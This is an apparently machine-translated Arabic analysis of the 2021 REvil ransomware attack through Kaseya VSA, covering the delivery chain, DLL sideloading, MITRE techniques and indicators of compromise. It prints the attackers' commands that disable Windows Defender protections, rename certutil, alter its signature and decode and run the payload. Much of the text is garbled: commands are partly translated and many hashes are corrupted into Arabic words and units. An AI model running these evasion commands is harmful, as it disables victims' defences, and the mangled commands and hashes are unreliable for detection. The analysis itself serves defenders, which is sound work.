حادث رانسوم وير لسلسلة التوريد Kaseya VSA

في 02 يوليو 2021، كشفت Kaseya، وهي شركة مطورة لحلول تكنولوجيا المعلومات تقدم خدماتها لمقدمي الخدمات المُدارة (MSPs)، أنها كانت ضحية لهجوم واسع النطاق من برامج الفدية. استهدف الهجوم، الذي نشرته مجموعة RaaS الشهيرة ReVil، البنية التحتية لـ VSA في Kaseya، مما عرض سلاسل التوريد الخاصة بها للخطر. استغلت مجموعة برامج الفدية ثغرة أمنية محددة في المصادقة في يوم الصفر في التطبيق لتحميل ملف ضار مشفر من Base64، مما أدى إلى إصابة البنية التحتية للعميل التي لديها برنامج وكيل VSA يعمل على الخوادم المستهدفة.

ناقل تسليم سلسلة التوريد

Kaseya's VSA هو برنامج للمراقبة والإدارة عن بعد (RMM) يمكّن MSPs من إجراء إدارة التصحيح والنسخ الاحتياطي ومراقبة العميل للعملاء. استفادت الجهات الفاعلة في مجال التهديد من ثغرة تجاوز المصادقة في يوم الصفر في واجهة الويب الخاصة بـ VSA، للحصول على جلسة مصادقة وتحميل حمولة وتنفيذ سلسلة من الأوامر عبر SQL للحصول على تنفيذ الأوامر. تم تسليم برنامج الفدية كتحديث للبرنامج يتنكر في صورة «إصلاح Kaseya VSA Agent Hot-fix». أدى هذا الإجراء إلى نشر مشفر، مما أدى إلى اختراق خادم VSA وتم إسقاطه في TempPath، تحت اسم الملف «agent.crt».

يتم إرسال ملف الحمولة «agent.crt» إلى برنامج مراقبة الوكيل (C:\PROGRAM FILES (X86)\ KASEYA\<ID>\ AGENTMON.EXE، حيث يكون المعرف هو مفتاح التعريف للخادم المتصل بمثيل الشاشة)، والذي يراقب نقاط نهاية العميل ويحدد ما إذا كانت المحطة تتطلب التصحيح أو التحديثات، فقط لتثبيتها بصمت في الخلفية. يقوم مراقب الوكيل بعد ذلك بكتابة «agent.crt» إلى دليل عمل وكيل VSA (C:\KWORKING\AGENT.crt).

«C:\WINDOWS\system32\cmd.exe" /c بينغ 127.0.0.1 -n 4979 > صفر &
C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe Set-MP Preference - تعطيل المراقبة في الوقت الحقيقي $true - تعطيل نظام منع التسلل $ true - تعطيل حماية IOAV $ true - تعطيل مسح البرامج النصية $true - تمكين الوصول إلى المجلد الخاضع للرقابة معطل - تمكين وضع تدقيق حماية الشبكة - القوة - تم تعطيل الإبلاغ عن الخرائط - الموافقة على إرسال العينات - عدم إرسال العينات ونسخها مطلقًا /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & ldwide -فك شفرة البحث والتطوير & del /q /f → الإيماء والدانات C:\Windows\cert.exe c:\kworking\agent.crt c:\kworking\agent.exe c:\kworking\agent.crt C:\Windows\cert.exe c:\kworking\agent.exe

التنفيذ

يتم استخدام الأمر التالي لتأخير أو تعطيل تنفيذ أوامر PowerShell:

«C:\WINDOWS\system32\cmd.exe" /c بينغ 127.0.0.1 -n 4979 > صفر

بعد ذلك، يتم تنفيذ أمر PowerShell بواسطة شاشة العامل، كما هو موضح أدناه:

C:\Windows\System32\WindowsPowerShell\v1.0\ powershell.exe تعيين التفضيلات

• تعطيل المراقبة في الوقت الحقيقي $true

• تعطيل نظام منع التطفل $ true

• تعطيل الحماية من الأشعة فوق البنفسجية $true

• تعطيل مسح النص البرمجي $true

• تم تعطيل تمكين الوصول إلى المجلدات التي يتم التحكم فيها

• تمكين وضع تدقيق حماية الشبكة - Force

• تم تعطيل إعداد الخرائط/الإبلاغ

• إرسال العينات والموافقة وعدم الإرسال

تعمل هذه الأوامر على تعطيل الحماية المختلفة المطبقة على النظام المستهدف، وتحديدًا ميزات Windows Defender، مثل حماية الشبكة، و iOfficeAntivirus (IOAV)، ومسح البرامج النصية، وإعداد تقارير MAPS، وما إلى ذلك.

يقوم الأمر التالي بإنشاء نسخة من ملف «certutil.exe»، وهو أداة مساعدة لإدارة الشهادات موجودة في جميع إصدارات Windows، من الموقع الافتراضي إلى دليل Windows وإعادة تسميته باسم «cert.exe»:

نسخة /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

يقوم سطر الأوامر هذا بإلحاق بيانات عشوائية بنهاية ملف cert.exe لتغيير توقيعه، مما يساعد على تجنب منتجات أمان مكافحة البرامج الضارة:

إيكو %راندوم% >> C:\Windows\cert.exe

يقوم الأمر التالي بفك تشفير ملف «agent.crt» إلى «agent.exe»:

C:\Windows\cert.exe -فك شفرة c:\kworking\agent.crt c:\kworking\agent.exe

بعد ذلك، يقوم سطر الأوامر هذا بتنظيف الملف وتنفيذ «agent.exe»:

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & # 8 c:\kworking\agent.exe

Agent.exe: ذا دروبر

Agent.exe عبارة عن قطارة تقوم بتنزيل العناصر التالية:

وصف القطع الأثرية Msmpeng.exe مكون ويندوز ديفندر موقّع من قبل MicrosoftMpsvc.dll جزء من MsMpEng.exe

يستخدم Revil إصدارًا معينًا من "MsMpEng.exe «، وهو عرضة للتحميل الجانبي لمكتبة الارتباط الديناميكي (DLL)، وهي طريقة هجوم إلكتروني شائعة تستفيد من كيفية تعامل التطبيقات مع ملفات DLL. يستخدم ملفات DLL الضارة بدلاً من الملفات الشرعية، والتي يتم تحميلها وتنفيذها بعد ذلك، مما يؤدي إلى إصابة الخادم المستهدف.

نشر خزانة برامج الفدية

يتم إخفاء خزانة برامج الفدية في ملف «mpsvc.dll» ويتم تنفيذها عندما يتم تنفيذ «MsMpEng.exe» بواسطة الملف «agent.exe». هذا هو تكتيك التهرب الذي يستخدمه الفاعل المهدد لتجاوز الفحوصات الأمنية.

تكتيكات وتقنيات MITRE ATT&CK

الوصول الأولي 1059.002 حل وسط سلسلة التوريد: حل وسط تنفيذ سلسلة توريد البرمجيات T1059.001 مترجم الأوامر والبرمجة النصية: PowerShellاستمرار وتصاعد الامتيازاتT1574.002 خطف تدفق التنفيذ: DLL التحميل الجانبي للدفاع التهرب من T1036.003 التنكر: إعادة تسمية أدوات النظامT1562.001 يضعف الدفاعات: تعطيل أو تعديل الأدواتT1140 يزيل/فك تشفير الملفات أو المعلوماتT1574.002 تدفق تنفيذ الاختراق: DLL التحميل الجانبي INGT1070.004 إزالة المؤشر على المضيف: حذف الملف/T112 تعديل السجل/T1553.002 تخريب عناصر التحكم في الثقة: توقيع الكود /Impact/1486 (البيانات) مشفرة لملفات التأثير C:\kworking\agent.exe (Revil Dropper)

مؤشرات التسوية

النوعالمؤشر

• شا-256
• شا-1
• MD5

• d55f983 c994ca160ec63a59f6b4250 f67f3e8c43a388aac60a4a6978e9f1e
• 5162f14d75e96edb914d1756349d6e11583db0b0
• 561 سم مكعب من البابا 71a6e8cc 1 cdceda 990 ead4

• شا-256
• شا-1
• MD5

• df2d6ef0450660aaae62c429610b964949812df2da1c57646 fc29a51c3f031e
• 682389250 × 914b95d6c23ab29dffe11c65c9
• 0299e3c2536543885860c7b61e1efc3f

• شا-256
• شا-1
• MD5

• دي سي 6b0e8c1e9c113f0364e1c8370060 ديب 3fcbe25b667 ديكا 7623a95cd21411f
• 8118474606a68c03581 eef85a05a90275a1ec24
• 835 قدمًا و 242 و 220 سم مكعب 76 ee5544 119562268

• شا-256
• شا-1
• MD5

• d55f983 c994ca160ec63a59f6b4250 f67f3e8c43a388aac60a4a6978e9f1e
• 5162f14d75e96edb914d1756349d6e11583db0b05162 f14d75e96edb914d1756349d6e11583db0b0
• 561 سم مكعب من البابا 71a6e8cc 1 cdceda 990 ead4

• شا-256
• شا-1
• MD5

• 66490 سم 59 cb9630 b53fa3fa7125b5c9511 afde38 edab 4459065938 c1974229 ca8
• 20e3a0955 باكا 4dc7f1f36d3b865e632474add77
• 5a97a50e45e64db41049fd88a75f2d2

• شا-256
• شا-1
• MD5

• 81d0c71f8b282076 cd93fb6b5bfd3932422d033109e2c92572 fc49e4abc2471
• 13d57aba8df4c95185c1a6d2f945 d65795 ee825b
• بي اي 6 سي 46239 اي 9 سي 753 دي 227 بي اف 1 اف 3428 اي 271

• شا-256
• شا-1
• MD5

• 1 fe9b489 c25b23b04d9996e8107671ede 69 bd6f6 dee2 fe7 ece38a0fb35f98e
• 3c2b0dcdb2a46fc1ec0a12a54309e35621ca925
• 18786bfac1be0df23ff94c029c4d63
• C:\Windows\mpsvc.dll (ريفيل/ سودينوكيبي DLL)

• شا-256
• شا-1
• MD5

• 8 أيام 620 دقيقة 9 أيب 35960 ديسيبل 766458 سم 8890 دي 987 سم 33 عمق 239 قدم 730 قدم 93 قدم 49 د 90 درهم 759 د
• 656 × 4 × 285 × 518 × 90 سم 1 × 669 × 79 بوصة × 75 ديسيبل 31 × 30 ب 1
• a47cf00 درهم إماراتي 769 d60d58bfe00c0b5421

• شا-256
• شا-1
• MD5

• e2a24ab94f865caeadf2c3ad015f31f23008 ac6db8312c2c2cbf32e4a5466 e2
• e1d689 bf92ff338752 b8ae5a2e8d75586 ad2b67b
• 7ea501911850a077cf0f9f6a7518859

• شا-256
• شا-1
• MD5

• d8353cfc5e696d3ae402c7c70565c1e7f31e49b74a6e12e5ab044f306b4b20
• 1bcf1ae39b898aaa8aa8b6b0207d7e307b234614ff6
• 849 fb558745e4089 a8232312594b21d2

• شا-256
• شا-1
• MD5

• d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93 cfac61 dd09ef9ac45a75f
• 7895e4d017c3ed5ed9b92c156316b4990361 eb
• 4a91cb0705539e1d09108c60f991 قدم مكعب

• شا-256
• شا-1
• MD5

• cc0cdc6a3d843e22c98170713 abf1d6ae06e8b5e34ed06e06e8b5e34ed06ac3159 سعر الصرف الصحي 85e3bd6
• 45c1b556 f5a875b71f2286e1ed4c7b32e705758
• 7d1807850275485397 ce2b218 eff159

• شا-256
• شا-1
• MD5

• 0496 ca 57e387 b 10 dfdac 809 de8a4e039 f68e8 d66535 d5 d19 ec76 d39f7d0a4402
• c0f569fc22cb5d8e02e44f85168b4b72a6669c3
• 040818b1b3c9b1b8245f5f5bcb4eebbc

• شا-256
• شا-1
• MD5

• 8e846 ed965bc0270a6f58c58e039ef2f78de4d 2bf82348 ca78ea0cea4f
• c2bb3eeef783c18d9825134 dc8b6e9cc261d4cca7
• a560890b8 af60b9824c73be74 ef24a46

C:\Windows\cert.exe

• شا256

• 36a71c6ac77db619e18f701 be47 d79306459 ff1550b0c92da 47b8c46e2ec0752

(ملاحظة: استخدام هذه التجزئة غير فعال لأنها نسخة عشوائية مضافة من ملف certutil.exe. يجب عليك استخدام الاكتشاف القائم على السلوك، على سبيل المثال، إعادة تسمية/نسخ certutil.exe)
C:\windows\msmpeng.exe

• شا-256
• شا-1
• MD5

• 33 ديسيبل 14 د 231 أ 4 أفا 18 ج 06513766 د 5 د 69 د 8 ب 88 ف 1 ه 697 د 127 د 24 د 4 ب 72 د 44 ج 7 أ
• 3d409b39b8502fcd23335a878f2 cbda6d71995
• 8 سم مكعب 83221870 dd07144e63 df594c391d9

(ملاحظة: هذا الملف هو إصدار قديم من Windows Defender. إنه ثنائي شرعي، ولكن يتم استخدامه لأغراض ضارة من قبل الخصوم مثل غيرهم من أدوات العيش خارج الأرض.)
C:\Program الملفات (x86)\ Kaseya\<ID>\ AgentMon.exe (الملف الثنائي الشرعي لـ VSA المستخدم للتنفيذ عن بُعد)

 

النطاقات https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txtYARA القواعد https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rulesRegistry المفاتيح_المحلية_الآلة/البرنامج\ Wow6432Node\ BlackLivesMatter

 

 

المراجع

https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident

https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

https://www.picussecurity.com/resource/blog/revil-sodinokibi-ransomware-kaseya-vsa-msp-supply-chain-attack